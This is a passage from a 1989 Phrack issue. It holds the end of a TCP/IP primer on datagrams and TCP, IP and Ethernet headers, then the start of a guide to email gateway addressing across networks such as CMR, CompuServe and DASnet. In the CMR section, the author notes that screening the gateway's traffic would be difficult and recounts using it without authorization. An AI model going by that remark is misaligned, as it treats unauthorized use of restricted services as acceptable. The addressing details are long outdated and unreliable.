  753. - The protocols needed to manage a specific physical medium, such
  754.   as Ethernet or a point to point line.
  755.  
  756. TCP/IP is based on the "catenet model."  (This is described in
  757. more detail in IEN 48.)  This model assumes that there are a
  758. large number of independent networks connected together by
  759. gateways.  The user should be able to access computers or other
  760. resources on any of these networks.  Datagrams will often pass
  761. through a dozen different networks before getting to their final
  762. destination.  The routing needed to accomplish this should be
  763. completely invisible to the user.  As far as the user is
  764. concerned, all he needs to know in order to access another system
  765. is an "Internet address."  This is an address that looks like
  766. 128.6.4.194.  It is actually a 32-bit number.  However it is
  767. normally written as 4 decimal numbers, each representing 8 bits
  768. of the address.  (The term "octet" is used by Internet
  769. documentation for such 8-bit chunks.  The term "byte" is not
  770. used, because TCP/IP is supported by some computers that have
  771. byte sizes other than 8 bits.)
  772.  
  773. Generally the structure of the address gives you some information
  774. about how to get to the system.  For example, 128.6 is a network
  775. number assigned by a central authority to Rutgers University.
  776. Rutgers uses the next octet to indicate which of the campus
  777. Ethernets is involved.  128.6.4 happens to be an Ethernet used by
  778. the Computer Science Department. The last octet allows for up to
  779. 254 systems on each Ethernet.  (It is 254 because 0 and 255 are
  780. not allowed, for reasons that will be discussed later.)  Note
  781. that 128.6.4.194 and 128.6.5.194 would be different systems.  The
  782. structure of an Internet address is described in a bit more
  783. detail later.
  784.  
  785. Of course I normally refer to systems by name, rather than by
  786. Internet address.  When I specify a name, the network software
  787. looks it up in a database, and comes up with the corresponding
  788. Internet address.  Most of the network software deals strictly in
  789. terms of the address.  (RFC 882 describes the name server
  790. technology used to handle this lookup.)
  791.  
  792. TCP/IP is built on "connectionless" technology.  Information is
  793. transfered as a sequence of "datagrams."  A datagram is a
  794. collection of data that is sent as a single message.  Each of
  795. these datagrams is sent through the network individually.  There
  796. are provisions to open connections (i.e. to start a conversation
  797. that will continue for some time).  However at some level,
  798. information from those connections is broken up into datagrams,
  799. and those datagrams are treated by the network as completely
  800. separate.  For example, suppose you want to transfer a 15000
  801. octet file.  Most networks can't handle a 15000 octet datagram.
  802. So the protocols will break this up into something like 30
  803. 500-octet datagrams.  Each of these datagrams will be sent to the
  804. other end.  At that point, they will be put back together into
  805. the 15000-octet file.  However while those datagrams are in
  806. transit, the network doesn't know that there is any connection
  807. between them.  It is perfectly possible that datagram 14 will
  808. actually arrive before datagram 13.  It is also possible that
  809. somewhere in the network, an error will occur, and some datagram
  810. won't get through at all.  In that case, that datagram has to be
  811. sent again.
  812.  
  813. Note by the way that the terms "datagram" and "packet" often seem
  814. to be nearly interchangable.  Technically, datagram is the right
  815. word to use when describing TCP/IP.  A datagram is a unit of
  816. data, which is what the protocols deal with.  A packet is a
  817. physical thing, appearing on an Ethernet or some wire.  In most
  818. cases a packet simply contains a datagram, so there is very
  819. little difference.  However they can differ.  When TCP/IP is used
  820. on top of X.25, the X.25 interface breaks the datagrams up into
  821. 128-byte packets.  This is invisible to IP, because the packets
  822. are put back together into a single datagram at the other end
  823. before being processed by TCP/IP.  So in this case, one IP
  824. datagram would be carried by several packets.  However with most
  825. media, there are efficiency advantages to sending one datagram
  826. per packet, and so the distinction tends to vanish.
  827.  
  828.  
  829. * The TCP level
  830.  
  831. Two separate protocols are involved in handling TCP/IP datagrams.
  832. TCP (the "transmission control protocol") is responsible for
  833. breaking up the message into datagrams, reassembling them at the
  834. other end, resending anything that gets lost, and putting things
  835. back in the right order.  IP (the "internet protocol") is
  836. responsible for routing individual datagrams.  It may seem like
  837. TCP is doing all the work.  However in the Internet, simply
  838. getting a datagram to its destination can be a complex job.  A
  839. connection may require the datagram to go through several
  840. networks at Rutgers, a serial line to the John von Neuman
  841. Supercomputer Center, a couple of Ethernets there, a series of
  842. 56Kbaud phone lines to another NSFnet site, and more Ethernets on
  843. another campus.  Keeping track of the routes to all of the
  844. destinations and handling incompatibilities among different
  845. transport media turns out to be a complex job.  Note that the
  846. interface between TCP and IP is fairly simple.  TCP simply hands
  847. IP a datagram with a destination.  IP doesn't know how this
  848. datagram relates to any datagram before it or after it.
  849.  
  850. It may have occurred to you that something is missing here.  I
  851. have talked about Internet addresses, but not about how you keep
  852. track of multiple connections to a given system.  Clearly it
  853. isn't enough to get a datagram to the right destination.  TCP has
  854. to know which connection this datagram is part of.  This task is
  855. referred to as "demultiplexing."  In fact, there are several
  856. levels of demultiplexing going on in TCP/IP.  The information
  857. needed to do this demultiplexing is contained in a series of
  858. "headers."  A header is simply a few extra octets tacked onto the
  859. beginning of a datagram by some protocol in order to keep track
  860. of it.  It's a lot like putting a letter into an envelope and
  861. putting an address on the outside of the envelope.  Except with
  862. modern networks it happens several times.  It's like you put the
  863. letter into a little envelope, your secretary puts that into a
  864. somewhat bigger envelope, the campus mail center puts that
  865. envelope into a still bigger one, etc.  Here is an overview of
  866. the headers that get stuck on a message that passes through a
  867. typical TCP/IP network:
  868.  
  869. It starts with a single data stream, say a file you are trying to
  870. send to some other computer:
  871.  
  872.      ......................................................
  873.  
  874. TCP breaks it up into manageable chunks.  (In order to do this,
  875. TCP has to know how large a datagram your network can handle.
  876. Actually, the TCP's at each end say how big a datagram they can
  877. handle, and then they pick the smallest size.)
  878.  
  879.      .... .... .... .... .... .... .... ....
  880.  
  881. TCP puts a header at the front of each datagram.  This header
  882. actually contains at least 20 octets, but the most important ones
  883. are a source and destination "port number" and a "sequence
  884. number."  The port numbers are used to keep track of different
  885. conversations.  Suppose 3 different people are transferring
  886. files.  Your TCP might allocate port numbers 1000, 1001, and 1002
  887. to these transfers.  When you are sending a datagram, this
  888. becomes the "source" port number, since you are the source of the
  889. datagram.  Of course the TCP at the other end has assigned a port
  890. number of its own for the conversation.  Your TCP has to know the
  891. port number used by the other end as well.  (It finds out when
  892. the connection starts, as I will explain below.)  It puts this in
  893. the "destination" port field.  Of course if the other end sends a
  894. datagram back to you, the source and destination port numbers
  895. will be reversed, since then it will be the source and you will
  896. be the destination.  Each datagram has a sequence number.  This
  897. is used so that the other end can make sure that it gets the
  898. datagrams in the right order, and that it hasn't missed any.
  899. (See the TCP specification for details.)  TCP doesn't number the
  900. datagrams, but the octets.  So if there are 500 octets of data in
  901. each datagram, the first datagram might be numbered 0, the second
  902. 500, the next 1000, the next 1500, etc.  Finally, I will mention
  903. the Checksum.  This is a number that is computed by adding up all
  904. the octets in the datagram (more or less - see the TCP spec).
  905. The result is put in the header.  TCP at the other end computes
  906. the checksum again.  If they disagree, then something bad
  907. happened to the datagram in transmission, and it is thrown away.
  908. So here's what the datagram looks like now.
  909.  
  910.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  911.        |          Source Port           |       Destination Port       |
  912.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  913.        |                         Sequence Number                       |
  914.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  915.        |                      Acknowledgment Number                    |
  916.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  917.        |  Data |           |U|A|P|R|S|F|                               |
  918.        | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
  919.        |       |           |G|K|H|T|N|N|                               |
  920.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  921.        |           Checksum            |         Urgent Pointer        |
  922.        +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  923.        |   your data ... next 500 octets                               |
  924.        |   ......                                                      |
  925.  
  926. If you abbreviate the TCP header as "T", the whole file now looks like this:
  927.  
  928.      T.... T.... T.... T.... T.... T.... T....
  929.  
  930. You will note that there are items in the header that I have not
  931. described above.  They are generally involved with managing the
  932. connection.  In order to make sure the datagram has arrived at
  933. its destination, the recipient has to send back an
  934. "acknowledgement."  This is a datagram whose "Acknowledgement
  935. number" field is filled in.  For example, sending a packet with
  936. an acknowledgement of 1500 indicates that you have received all
  937. the data up to octet number 1500.  If the sender doesn't get an
  938. acknowledgement within a reasonable amount of time, it sends the
  939. data again.  The window is used to control how much data can be
  940. in transit at any one time.  It is not practical to wait for each
  941. datagram to be acknowledged before sending the next one.  That
  942. would slow things down too much.  On the other hand, you can't
  943. just keep sending, or a fast computer might overrun the capacity
  944. of a slow one to absorb data.  Thus each end indicates how much
  945. new data it is currently prepared to absorb by putting the number
  946. of octets in its "Window" field.  As the computer receives data,
  947. the amount of space left in its window decreases.  When it goes
  948. to zero, the sender has to stop.  As the receiver processes the
  949. data, it increases its window, indicating that it is ready to
  950. accept more data. Often the same datagram can be used to
  951. acknowledge receipt of a set of data and to give permission for
  952. additional new data (by an updated window).  The "Urgent" field
  953. allows one end to tell the other to skip ahead in its processing
  954. to a particular octet.  This is often useful for handling
  955. asynchronous events, for example when you type a control
  956. character or other command that interrupts output.  The other
  957. fields are not pertinent to understanding what I am trying to
  958. explain in this article.
  959.  
  960.  
  961. * The IP Level
  962.  
  963. TCP sends each datagram to IP.  Of course it has to tell IP the
  964. Internet address of the computer at the other end.  Note that
  965. this is all IP is concerned about.  It doesn't care about what is
  966. in the datagram, or even in the TCP header.  IP's job is simply
  967. to find a route for the datagram and get it to the other end.  In
  968. order to allow gateways or other intermediate systems to forward
  969. the datagram, it adds its own header.  The main things in this
  970. header are the source and destination Internet address (32-bit
  971. addresses, like 128.6.4.194), the protocol number, and another
  972. checksum.  The source Internet address is simply the address of
  973. your machine.  (This is necessary so the other end knows where
  974. the datagram came from.)  The destination Internet address is the
  975. address of the other machine.  (This is necessary so any gateways
  976. in the middle know where you want the datagram to go.)  The
  977. protocol number tells IP at the other end to send the datagram to
  978. TCP.
  979.  
  980. Although most IP traffic uses TCP, there are other protocols that
  981. can use IP, so you have to tell IP which protocol to send the
  982. datagram to.  Finally, the checksum allows IP at the other end to
  983. verify that the header wasn't damaged in transit.  Note that TCP
  984. and IP have separate checksums.  IP needs to be able to verify
  985. that the header didn't get damaged in transit, or it could send a
  986. message to the wrong place.  It is both more efficient and safer
  987. to have TCP compute a separate checksum for the TCP header and
  988. data.  Once IP has tacked on its header, here's what the message
  989. looks like:
  990.  
  991.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  992.       |Version|  IHL  |Type of Service|          Total Length         |
  993.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  994.       |         Identification        |Flags|      Fragment Offset    |
  995.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  996.       |  Time to Live |    Protocol   |         Header Checksum       |
  997.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  998.       |                       Source Address                          |
  999.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1000.       |                    Destination Address                        |
  1001.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1002.       |  TCP header, then your data ......                            |
  1003.       |                                                               |
  1004.  
  1005. If you represent the IP header by an "I", your file now looks like this:
  1006.  
  1007.      IT....   IT....   IT....   IT....   IT....   IT....   IT....
  1008.  
  1009. Again, the header contains some additional fields that will not
  1010. be discussed in this article because they are not relevent to
  1011. understanding the process.  The flags and fragment offset are
  1012. used to keep track of the pieces when a datagram has to be split
  1013. up.  This can happen when datagrams are forwarded through a
  1014. network for which they are too big.  (This will be discussed a
  1015. bit more below.) The time to live is a number that is decremented
  1016. whenever the datagram passes through a system.  When it goes to
  1017. zero, the datagram is discarded.  This is done in case a loop
  1018. develops in the system somehow.  Of course this should be
  1019. impossible, but well-designed networks are built to cope with
  1020. "impossible" conditions.
  1021.  
  1022. At this point, it's possible that no more headers are needed.  If
  1023. your computer happens to have a direct phone line connecting it
  1024. to the destination computer, or to a gateway, it may simply send
  1025. the datagrams out on the line (though likely a synchronous
  1026. protocol such as HDLC would be used, and it would add at least a
  1027. few octets at the beginning and end).
  1028.  
  1029.  
  1030. * The Ethernet Level
  1031.  
  1032. Most networks these days use Ethernet which has its own
  1033. addresses.  The people who designed Ethernet wanted to make sure
  1034. that no two machines would end up with the same Ethernet address.
  1035. Furthermore, they didn't want the user to have to worry about
  1036. assigning addresses.  So each Ethernet controller comes with an
  1037. address built-in from the factory.  In order to make sure that
  1038. they would never have to reuse addresses, the Ethernet designers
  1039. allocated 48 bits for the Ethernet address.  People who make
  1040. Ethernet equipment have to register with a central authority, to
  1041. make sure that the numbers they assign don't overlap any other
  1042. manufacturer.  Ethernet is a "broadcast medium."  That is, it is
  1043. in effect like an old party line telephone.  When you send a
  1044. packet out on the Ethernet, every machine on the network sees the
  1045. packet.  So something is needed to make sure that the right
  1046. machine gets it.  As you might guess, this involves the Ethernet
  1047. header.
  1048.  
  1049. Every Ethernet packet has a 14-octet header that includes the
  1050. source and destination Ethernet address, and a type code.  Each
  1051. machine is supposed to pay attention only to packets with its own
  1052. Ethernet address in the destination field.  (It's perfectly
  1053. possible to cheat, which is one reason that Ethernet
  1054. communications are not terribly secure.)  Note that there is no
  1055. connection between the Ethernet address and the Internet address.
  1056. Each machine has to have a table of what Ethernet address
  1057. corresponds to what Internet address.  (I will describe how this
  1058. table is constructed a bit later.)  In addition to the addresses,
  1059. the header contains a type code.  The type code is to allow for
  1060. several different protocol families to be used on the same
  1061. network.  So you can use TCP/IP, DECnet, Xerox NS, etc. at the
  1062. same time. Each of them will put a different value in the type
  1063. field.  Finally, there is a checksum.  The Ethernet controller
  1064. computes a checksum of the entire packet.  When the other end
  1065. receives the packet, it recomputes the checksum, and throws the
  1066. packet away if the answer disagrees with the original.  The
  1067. checksum is put on the end of the packet, not in the header.  The
  1068. final result is that your message looks like this:
  1069.  
  1070.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1071.       |       Ethernet destination address (first 32 bits)            |
  1072.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1073.       | Ethernet dest (last 16 bits)  |Ethernet source (first 16 bits)|
  1074.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1075.       |       Ethernet source address (last 32 bits)                  |
  1076.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1077.       |        Type code              |
  1078.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1079.       |  IP header, then TCP header, then your data                   |
  1080.       |                                                               |
  1081.           ...
  1082.       |                                                               |
  1083.       |   end of your data                                            |
  1084.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1085.       |                       Ethernet Checksum                       |
  1086.       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
  1087.  
  1088. If you represent the Ethernet header with "E", and the Ethernet
  1089. checksum with "C", your file now looks like this:
  1090.  
  1091.      EIT....C   EIT....C   EIT....C   EIT....C   EIT....C
  1092.  
  1093. When these packets are received by the other end, of course all
  1094. the headers are removed.  The Ethernet interface removes the
  1095. Ethernet header and the checksum.  It looks at the type code.
  1096. Since the type code is the one assigned to IP, the Ethernet
  1097. device driver passes the datagram up to IP.  IP removes the IP
  1098. header.  It looks at the IP protocol field.  Since the protocol
  1099. type is TCP, it passes the datagram up to TCP.  TCP now looks at
  1100. the sequence number.  It uses the sequence numbers and other
  1101. information to combine all the datagrams into the original file.
  1102.  
  1103. This ends my initial summary of TCP/IP.  There are still some
  1104. crucial concepts I have not gotten to, so in part two, I will go
  1105. back and add details in several areas.  (For detailed
  1106. descriptions of the items discussed here see, RFC 793 for TCP,
  1107. RFC 791 for IP, and RFC's 894 and 826 for sending IP over
  1108. Ethernet.)
  1109. __________________________________________________________________
  1110.  
  1111.                                 ==Phrack Inc.==
  1112.  
  1113.                      Volume Three, Issue 28, File #4 of 12
  1114.  
  1115.                               Network Miscellany
  1116.                               ~~~~~~~~~~~~~~~~~~
  1117.                                  by Taran King
  1118.  
  1119.                                  June 1, 1989
  1120.  
  1121.  
  1122. ACSNET
  1123. ~~~~~~
  1124. Australian Computer Science Network (ACSNET), also known as Oz,
  1125. has its gateway through the CSNET node munnari.oz.au and if you
  1126. cannot directly mail to the .oz.au domain, try either
  1127. username%munnari.oz.au@UUNET.UU.NET or
  1128. munnari!username@UUNET.UU.NET.
  1129.  
  1130. AT&T MAIL
  1131. ~~~~~~~~~
  1132. AT&T Mail is a mailing service of AT&T, probably what you might
  1133. call it's MCI-Mail equivalent.  It is available on the UUCP
  1134. network as node name attmail but I've had problems having mail
  1135. get through.  Apparently, it does cost money to mail to this
  1136. service and the surrounding nodes are not willing to pick up the
  1137. tab for the ingoing mail, or at least, this has seemingly been
  1138. the case thus far.  I believe, though, that perhaps routing to
  1139. att!attmail!user would work.
  1140.  
  1141. AT&T recently announced six new X.400 interconnections between
  1142. AT&T Mail and electronic mail services in the U.S., Korea,
  1143. Sweden, Australia, and Finland.  In the U.S., AT&T Mail is now
  1144. interconnected with Telenet Communications Corporation's service,
  1145. Telemail, allowing users of both services to exchange messages
  1146. easily.  With the addition of these interconnections, the AT&T
  1147. Mail Gateway 400 Service allows AT&T Mail subscribers to exchange
  1148. messages with users of the following electronic messaging
  1149. systems:
  1150.  
  1151. Company                    E-Mail Name*            Country
  1152. -------                    ------------            -------
  1153. TeleDelta                  TeDe 400                Sweden
  1154. OTC                        MPS400                  Australia
  1155. Telecom-Canada             Envoy100                Canada
  1156. DACOM                      DACOM MHS               Korea
  1157. P&T-Tele                   MailNet 400             Finland
  1158. Helsinki Telephone Co.     ELISA                   Finland
  1159. Dialcom                    Dialcom                 USA
  1160. Telenet                    Telemail                USA
  1161. KDD                        Messavia                Japan
  1162. Transpac                   ATLAS400                France
  1163.  
  1164. The interconnections are based on the X.400 standard, a set of
  1165. guidelines for the format, delivery and receipt of electronic
  1166. messages recommended by an international standards committee the
  1167. CCITT.  International X.400 messages incur a surcharge.  They
  1168. are:
  1169.  
  1170.                  To Canada:
  1171.                     Per note:            $.05
  1172.                     Per message unit:    $.10
  1173.  
  1174.                  To other international locations:
  1175.                     Per note:            $.20
  1176.                     Per message unit:    $.50
  1177.  
  1178. There is no surcharge for X.400 messages within the U.S.  The
  1179. following are contacts to speak with about mailing through these
  1180. mentioned networks.  Other questions can be directed through AT&T
  1181. Mail's toll-free number, 1-800-624-5672.
  1182.  
  1183. MHS Gateway:  mhs!atlas                     MHS Gateway:  mhs!dacom
  1184. Administrator:  Bernard Tardieu             Administrator:  Bob Nicholson
  1185. Transpac                                    AT&T
  1186. Phone:  3399283203                          Morristown, NJ  07960
  1187. Phone:  +1 201 644 1838
  1188.  
  1189. MHS Gateway:  mhs!dialcom                   MHS Gateway:  mhs!elisa
  1190. Administrator:  Mr. Laraman                 Administrator:  Ulla Karajalainen
  1191. Dialcom                                     Nokia Data
  1192. South Plainfield, NJ  07080                 Phone:  01135804371
  1193. Phone:  +1 441 493 3843
  1194.  
  1195. MHS Gateway:  mhs!envoy                     MHS Gateway:  mhs!kdd
  1196. Administrator:  Kin C. Ma                   Administrator:  Shigeo Lwase
  1197. Telecom Canada                              Kokusai Denshin Denwa CO.
  1198. Phone:  +1 613 567 7584                     Phone:  8133477419
  1199.  
  1200. MHS Gateway:  mhs!mailnet                   MHS Gateway:  mhs!otc
  1201. Administrator:  Kari Aakala                 Administrator:  Gary W. Krumbine
  1202. Gen Directorate Of Post &                   AT&T Information Systems
  1203. Phone:  35806921730                         Lincroft, NJ  07738
  1204.                                             Phone:  +1 201 576 2658
  1205.  
  1206. MHS Gateway:  mhs!telemail                  MHS Gateway:  mhs
  1207. Administrator:  Jim Kelsay                  Administrator:  AT&T Mail MHS
  1208. GTE Telenet Comm Corp                                       Gateway
  1209. Reston, VA  22096                           AT&T
  1210. Phone:  +1 703 689 6034                     Lincroft, NJ  08838
  1211.                                             Phone:  +1 800 624 5672
  1212.  
  1213. CMR
  1214. ~~~
  1215. Previously known as Intermail, the Commercial Mail Relay (CMR)
  1216. Service is a mail relay service between the Internet and three
  1217. commercial electronic mail systems:  US Sprint/Telenet, MCI-Mail,
  1218. and DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL).
  1219.  
  1220. An important note:  The only requirement for using this mail
  1221. gateway is that the work conducted must be DARPA sponsored
  1222. research and other approved government business.  Basically, this
  1223. means that unless you've got some government-related business,
  1224. you're not supposed to be using this gateway.  Regardless, it
  1225. would be very difficult for them to screen everything that goes
  1226. through their gateway.  Before I understood the requirements of
  1227. this gateway, I was sending to a user of MCI-Mail and was not
  1228. contacted about any problems with that communication.
  1229. Unfortunately, I mistyped the MCI-Mail address on one of the
  1230. letters and that letter ended up getting read by system
  1231. administrators who then informed me that I was not to be using
  1232. that system, as well as the fact that they would like to bill me
  1233. for using it.  That was an interesting thought on their part
  1234. anyway, but do note that using this service does incur charges.
  1235.  
  1236. The CMR mailbox address in each system corresponds to the label:
  1237.  
  1238.           Telemail:  [Intermail/USCISI]TELEMAIL/USA
  1239.           MCI-Mail:  Intermail      or      107-8239
  1240.           CompMail:  Intermail      or      CMP0817
  1241.           NSF-Mail:  Intermail      or      NSF153
  1242.          USDA-Mail:  Intermail      or      AGS9999
  1243.  
  1244. Addressing examples for each e-mail system are as follows:
  1245.  
  1246. MCIMAIL:
  1247.    123-4567             seven digit address
  1248.    Everett T. Bowens    person's name (must be unique!)
  1249.  
  1250. COMPMAIL:
  1251.    CMP0123              three letters followed by three or four digits
  1252.    S.Cooper             initial, then "." and then last name
  1253.    134:CMP0123          domain, then ":" and then combination system and
  1254.                         account number
  1255.  
  1256. NSFMAIL:
  1257.    NSF0123              three letters followed by three or four digits
  1258.    A.Phillips           initial, then "." and then last name
  1259.    157:NSF0123          domain, then ":" and then combination system and
  1260.                          account number
  1261.  
  1262. USDAMAIL:
  1263.    AGS0123              three letters followed by three or four digits
  1264.    P.Shifter            initial, then "." and then last name
  1265.    157:AGS0123          domain, then ":" and then combination system and
  1266.                          account number
  1267.  
  1268. TELEMAIL:
  1269.    BARNOC               user (directly on Telemail)
  1270.    BARNOC/LODH          user/organization (directly on Telemail)
  1271.    [BARNOC/LODH]TELEMAIL/USA
  1272.                          [user/organization]system branch/country
  1273.  
  1274. The following are other Telenet system branches/countries that
  1275. can be mailed to:
  1276.  
  1277. TELEMAIL/USA     NASAMAIL/USA     MAIL/USA            TELEMEMO/AUSTRALIA
  1278. TELECOM/CANADA   TOMMAIL/CHILE    TMAILUK/GB          ITALMAIL/ITALY
  1279. ATI/JAPAN        PIPMAIL/ROC      DGC/USA             FAAMAIL/USA
  1280. GSFC/USA         GTEMAIL/USA      TM11/USA            TNET.TELEMAIL/USA
  1281. USDA/USA
  1282.  
  1283.      Note:  OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to
  1284. it, the format would be [A.MAILBOX/OMNET]MAIL/USA.  The following are available
  1285. subdivisions of OMNET:
  1286.  
  1287.          AIR     Atmospheric Sciences
  1288.          EARTH   Solid Earth Sciences
  1289.          LIFE    Life Sciences
  1290.          OCEAN   Ocean Sciences
  1291.          POLAR   Interdisciplinary Polar Studies
  1292.          SPACE   Space Science and Remote Sensing
  1293.  
  1294. The following is a list of DIALCOM systems available in the
  1295. listed countries with their domain and system numbers:
  1296.  
  1297. Service Name            Country             Domain Number    System Number
  1298. ~~~~~~~~~~~~            ~~~~~~~             ~~~~~~~~~~~~~    ~~~~~~~~~~~~~
  1299. Keylink-Dialcom         Australia           60               07, 08, 09
  1300. Dialcom                 Canada              20               20, 21, 22, 23, 24
  1301. DPT Databoks            Denmark             124              71
  1302. Telebox                 Finland             127              62
  1303. Telebox                 West Germany        30               15, 16
  1304. Dialcom                 Hong Kong           80               88, 89
  1305. Eirmail                 Ireland             100              74
  1306. Goldnet                 Israel              50               05, 06
  1307. Mastermail              Italy               130              65, 67
  1308. Mastermail              Italy               1                66, 68
  1309. Dialcom                 Japan               70               13, 14
  1310. Dialcom                 Korea               1                52
  1311. Telecom Gold            Malta               100              75
  1312. Dialcom                 Mexico              1                52
  1313. Memocom                 Netherlands         124              27, 28, 29
  1314. Memocom                 Netherlands         1                55
  1315. Starnet                 New Zealand         64               01, 02
  1316. Dialcom                 Puerto Rico         58               25
  1317. Telebox                 Singapore           88               10, 11, 12
  1318. Dialcom                 Taiwan              1                52
  1319. Telecom Gold            United Kingdom      100              01, 04, 17,
  1320. 80-89
  1321. DIALCOM                 USA                 1                29, 30, 31, 32,
  1322.                                                              33, 34, 37, 38,
  1323.                                                              41-59, 61, 62, 63,
  1324.                                                              90-99
  1325.  
  1326.  NOTE:  You can also mail to username@NASAMAIL.NASA.GOV or
  1327.         username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to
  1328.         mail to NASAMAIL or GSFCMAIL.
  1329.  
  1330. For more information and instructions on how to use CMR, send a
  1331. message to the user support group at
  1332. intermail-request@intermail.isi.edu (you'll get basically what
  1333. I've listed plus maybe a bit more).  Please read Chapter 3 of The
  1334. Future Transcendent Saga (Limbo to Infinity) for specifics on
  1335. mailing to these destination mailing systems.
  1336.  
  1337. COMPUSERVE
  1338. ~~~~~~~~~~
  1339. CompuServe is well known for its games and conferences.  It does, though, have
  1340. mailing capability.  Now, they have developed their own Internet domain, called
  1341. COMPUSERVE.COM.  It is relatively new and mail can be routed through either
  1342. TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA.
  1343.  
  1344. Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace
  1345.          TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
  1346.  
  1347. The CompuServe link appears to be a polled UUCP connection at the
  1348. gateway machine.  It is actually managed via a set of shell
  1349. scripts and a comm utility called xcomm, which operates via
  1350. command scripts built on the fly by the shell scripts during
  1351. analysis of what jobs exist to go into and out of CompuServe.
  1352.  
  1353. CompuServe subscriber accounts of the form 7xxxx,yyyy can be
  1354. addressed as 7xxxx.yyyy@compuserve.com.  CompuServe employees can
  1355. be addressed by their usernames in the csi.compuserve.com
  1356. subdomain.  CIS subscribers write mail to
  1357. ">inet:user@host.domain" to mail to users on the Wide-Area
  1358. Networks, where ">gateway:" is CompuServe's internal gateway
  1359. access syntax.  The gateway generates fully-RFC-compliant
  1360. headers.
  1361.  
  1362. To fully extrapolate -- from the CompuServe side, you would use
  1363. their EasyPlex mail system to send mail to someone in BITNET or
  1364. the Internet.   For example, to send me mail at my Bitnet id, you
  1365. would address it to:
  1366.  
  1367.             INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
  1368.  
  1369. Or to my Internet id:
  1370.  
  1371.             INET:C488869@UMCVMB.MISSOURI.EDU
  1372.  
  1373. Now, if you have a BITNET to Internet userid, this is a silly
  1374. thing to do, since your connect time to CompuServe costs you
  1375. money.  However, you can use this information to let people on
  1376. CompuServe contact YOU.  CompuServe Customer Service says that
  1377. there is no charge to either receive or send a message to the
  1378. Internet or BITNET.
  1379.  
  1380. DASNET
  1381. ~~~~~~
  1382. DASnet is a smaller network that connects to the Wide-Area
  1383. Networks but charges for their service.  DASnet subscribers get
  1384. charged for both mail to users on other networks AND mail for
  1385. them from users of other networks.  The following is a brief
  1386. description of DASnet, some of which was taken from their
  1387. promotional text letter.
  1388.  
  1389. DASnet allows you to exchange electronic mail with people on more
  1390. than 20 systems and networks that are interconnected with DASnet.
  1391. One of the drawbacks, though, is that, after being subscribed to
  1392. these services, you must then subscribe to DASnet, which is a
  1393. separate cost.  Members of Wide-Area networks can subscribe to
  1394. DASnet too.  Some of the networks and systems reachable through
  1395. DASnet include the following:
  1396.  
  1397.      ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network,
  1398.      Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI,
  1399.      PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source,
  1400.      Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The
  1401.      WELL, and Domains (i.e. ".COM" and ".EDU" etc.).  New systems are added
  1402.      all of the time.  As of the writing of this file, Connect, GoverNET,
  1403.      MacNET, and The American Institute of Physics PI-MAIL are soon to be
  1404.      connected.
  1405.  
  1406. You can get various accounts on DASnet including:
  1407.  
  1408.   o  Corporate Accounts -- If your organization wants more than one individual
  1409.                            subscription.
  1410.   o  Site Subscriptions -- If you want DASnet to link directly to your
  1411.                            organization's electronic mail system.
  1412.  
  1413. To send e-mail through DASnet, you send the message to the DASnet
  1414. account on your home system.  You receive e-mail at your mailbox,
  1415. as you do now.  On the Wide-Area Networks, you send mail to
  1416. XB.DAS@STANFORD.BITNET.  On the Subject:  line, you type the
  1417. DASnet address in brackets and then the username just outside of
  1418. them.  The real subject can be expressed after the username
  1419. separated by a "!"  (Example:  Subject:  [0756TK]randy!How's
  1420. Phrack?).
  1421.  
  1422. The only disadvantage of using DASnet as opposed to Wide-Area
